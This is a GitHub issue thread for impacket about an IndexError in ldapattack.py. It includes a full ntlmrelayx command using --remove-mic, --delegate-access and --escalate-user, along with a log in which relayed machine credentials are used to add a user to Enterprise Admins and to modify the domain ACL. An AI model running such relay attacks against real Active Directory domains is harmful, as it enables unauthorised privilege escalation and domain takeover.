### ISSUE TITLE
ldapattack.py IndexError: list index out of range

### ISSUE THREAD

**Issue by FuckAllWorld** [SecureAuthCorp/impacket#868]
### Configuration  
impacket version: 0.9.22
Python version:  python2.7
Target OS:  ubuntu 

### Debug Output With Command String  
i.e.  
proxychains4 -q python ntlmrelayx.py -t ldap://100.100.200.2 --remove-mic --delegate-access -smb2support --smb-port 7777 --escalate-user XXXXX\$ --no-http --no-dump
```
Impacket v0.9.19 - Copyright 2020 SecureAuth Corporation

[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host

[*] Servers started, waiting for connections
[*] Setting up SMB Server
[*] SMBD-Thread-2: Connection from TESTLAB/DC2$@124.*.*.* controlled, attacking target ldap://100.100.200.2
[-] Authenticating against ldap://100.100.200.2 as TESTLAB/DC2$ FAILED
[*] SMBD-Thread-3: Connection from /@124.*.*.* controlled, but there are no more targets left!
[*] SMBD-Thread-4: Connection from TESTLAB/ALI0789$@124.*.*.*controlled, attacking target ldap://100.100.200.2
[*] Authenticating against ldap://100.100.200.2 as TESTLAB/ALI0789$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-4: Connection from TESTLAB/ALI0789$@124.*.*.* controlled, but there are no more targets left!
[*] SMBD-Thread-6: Connection from /@124.*.*.* controlled, attacking target ldap://100.100.200.2
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
Exception in thread Thread-5:
Traceback (most recent call last):
  File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/local/lib/python2.7/dist-packages/impacket-0.9.22.dev1+20200416.91838.62162e0-py2.7.egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 593, in run
    self.aclAttack(userDn, domainDumper)
  File "/usr/local/lib/python2.7/dist-packages/impacket-0.9.22.dev1+20200416.91838.62162e0-py2.7.egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 305, in aclAttack
    entry = self.client.entries[0]
IndexError: list index out of range
```

**Comment by 0xdeaddood** [comment]
Hi @FuckAllWorld! 

The banner when you run the script says Impacket v0.9.19. There seems to be something wrong with your installation. Regarding the error, it could be an issue that has been fixed in #835. 

Could you try reinstalling impacket and using the latest version?

**Comment by asolino** [comment]
No answer, closing
